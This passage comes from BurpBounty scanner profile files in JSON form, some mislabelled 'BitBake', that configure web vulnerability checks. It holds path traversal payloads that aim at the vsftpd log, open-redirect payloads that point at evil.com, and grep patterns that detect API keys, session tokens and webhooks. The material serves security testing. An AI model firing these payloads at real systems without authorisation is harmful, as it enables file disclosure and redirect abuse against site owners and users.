"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,./../{FILE}",
"true,./.././../{FILE}",
"true,./.././.././../{FILE}",
"true,./.././.././.././../{FILE}",
"true,./.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././.././.././../{FILE}",
"true,.\\..\\{FILE}",
"true,.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.//..//{FILE}",
"true,.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,../{FILE}",
"true,../..//{FILE}",
"true,../..//../{FILE}",
"true,../..//../..//{FILE}",
"true,../..//../..//../{FILE}",
"true,../..//../..//../..//{FILE}",
"true,../..//../..//../..//../{FILE}",
"true,../..//../..//../..//../..//{FILE}",
"true,..\\{FILE}",
"true,..\\..\\\\{FILE}",
"true,..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
"true,..///{FILE}",
"true,../..///{FILE}",
"true,../..//..///{FILE}",
"true,../..//../..///{FILE}",
"true,../..//../..//..///{FILE}",
"true,../..//../..//../..///{FILE}",
"true,../..//../..//../..//..///{FILE}",
"true,../..//../..//../..//../..///{FILE}",
"true,..\\\\\\{FILE}",
"true,..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,CONNECT:"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Linux-vsftpd-log",
"IssueSeverity": "Medium",
"IssueConfidence": "Certain",
"IssueDetail": "Linux-vsftpd-log listed",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [
{
"type": "Payload",
"match": "{FILE}",
"replace": "var/log/vsftpd.log",
"regex": "String"
}
],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/MAC_Address.bb | [
{
"ProfileName": "MAC_Address",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,^([a-fA-F0-9]{2}(:[a-fA-F0-9]{2}){5})",
"true,Or,[^a-zA-Z0-9]([a-fA-F0-9]{2}(:[a-fA-F0-9]{2}){5})"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "MAC Address",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Mailto.bb | [
{
"ProfileName": "Mailto",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,(?\u003c\u003dmailto:)[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9.-]+"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Mailto",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/NoSQL_Session_Token.bb | [
{
"ProfileName": "NoSQL_Session_Token",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,_SessionToken"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "NoSQL Session Token",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/NuGet_Api_Key.bb | [
{
"ProfileName": "NuGet_Api_Key",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,X-NuGet-ApiKey"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": true,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "NuGet Api Key",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/OAuth2.bb | [
{
"ProfileName": "OAuth2",
"Name": "",
"Enabled": true,
"Scanner": 3,
"Author": "@egarme",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,All Request,Value,response_type",
"true,Or,All Request,Value,client_id",
"true,Or,All Request,Value,grant_type",
"true,Or,All Request,Value,redirect_uri",
"true,Or,All Request,Value,oauth",
"true,Or,All Request,Value,oidc"
],
"Tags": [
"JWT",
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "OAuth2",
"IssueSeverity": "Information",
"IssueConfidence": "Firm",
"IssueDetail": "OAuth2 Found",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/OAuth2response.bb | [
{
"ProfileName": "OAuth2response",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@egarme",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,response_type",
"true,Or,client_id",
"true,Or,grant_type",
"true,Or,redirect_uri",
"true,Or,oauth",
"true,Or,oidc"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "OAuth2",
"IssueSeverity": "Information",
"IssueConfidence": "Firm",
"IssueDetail": "OAuth2 Found",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Octopus_API_Key.bb | [
{
"ProfileName": "Octopus_API_Key",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,X-Octopus-ApiKey"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": true,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "X-Octopus-ApiKey",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/OpenRedirect-ParameterPollution.bb | [
{
"ProfileName": "OpenRedirect-ParameterPollution",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@egarme",
"Payloads": [
"true,/{payload}",
"true,?next\u003d{payload}",
"true,?url\u003d{payload}",
"true,?target\u003d{payload}",
"true,?rurl\u003d{payload}",
"true,?dest\u003d{payload}",
"true,?destination\u003d{payload}",
"true,?redir\u003d{payload}",
"true,?redirect_uri\u003d{payload}",
"true,?redirect\u003d{payload}",
"true,/redirect/{payload}",
"true,/cgi-bin/redirect.cgi?{payload}",
"true,/out/{payload}",
"true,/out?{payload}",
"true,?view\u003d{payload}",
"true,/login?to\u003d{payload}",
"true,?image_url\u003d{payload}",
"true,?go\u003d{payload}",
"true,?return\u003d{payload}",
"true,?returnTo\u003d{payload}",
"true,?return_to\u003d{payload}",
"true,?checkout_url\u003d{payload}",
"true,?continue\u003d{payload}",
"true,?return_path\u003d{payload}"
],
"Encoder": [
" "
],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,-Token1337-"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 4,
"MaxRedir": 9,
"payloadPosition": 2,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "OpenRedirect-ParameterPollution",
"IssueSeverity": "Medium",
"IssueConfidence": "Certain",
"IssueDetail": "Open Redirect with payload: \u003cbr\u003e\u003cpayload\u003e",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [
{
"type": "Payload",
"match": "{payload}",
"replace": "http://www.wagiro.com/test-open-redirect",
"regex": "String"
}
],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/OpenRedirect.bb | [
{
"ProfileName": "OpenRedirect",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@egarme",
"Payloads": [
"true,%2F%09%2Fevil.com",
"true,%2F%10%2Fevil.com",
"true,%2F%13%2Fevil.com",
"true,evil.com",
"true,/evil.com",
"true,//evil.com",
"true,///evil.com",
"true,////evil.com",
"true,/\\evil.com",
"true,%2fevil.com",
"true,%2f$2fevil.com",
"true,%2fevil.com%2f%2f",
"true,$2f%2fevil.com%2f%2f",
"true,%2fevil.com//",
"true,http://example.com%0a%23.evil.com"
],
"Encoder": [
" "
],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,location.*evil.com"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": true,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 0,
"RedirType": 4,
"MaxRedir": 9,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "OpenRedirect",
"IssueSeverity": "Medium",
"IssueConfidence": "Certain",
"IssueDetail": "Open Redirect with payload: \u003cbr\u003e\u003cpayload\u003e",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/OpenRedirectActive.bb | [
{
"ProfileName": "OpenRedirectActive",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@GochaOqradze",
"Payloads": [
"true,redirectx"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,\u003cmeta http-equiv\u003d\"refresh\".*redirectx\" /\u003e",
"true,Or,window\\.location.*redirectx",
"true,Or,Location:.*redirectx"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "",
"IssueSeverity": "",
"IssueConfidence": "",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [
65,
36,
1,
6,
5,
64,
0,
3
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Outlook_Team.bb | [
{
"ProfileName": "Outlook_Team",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,(https\\\\:\\/\\/outlook\\\\.office.com\\/webhook\\/[0-9a-f-]{36}\\\\@)"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Outlook Team",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
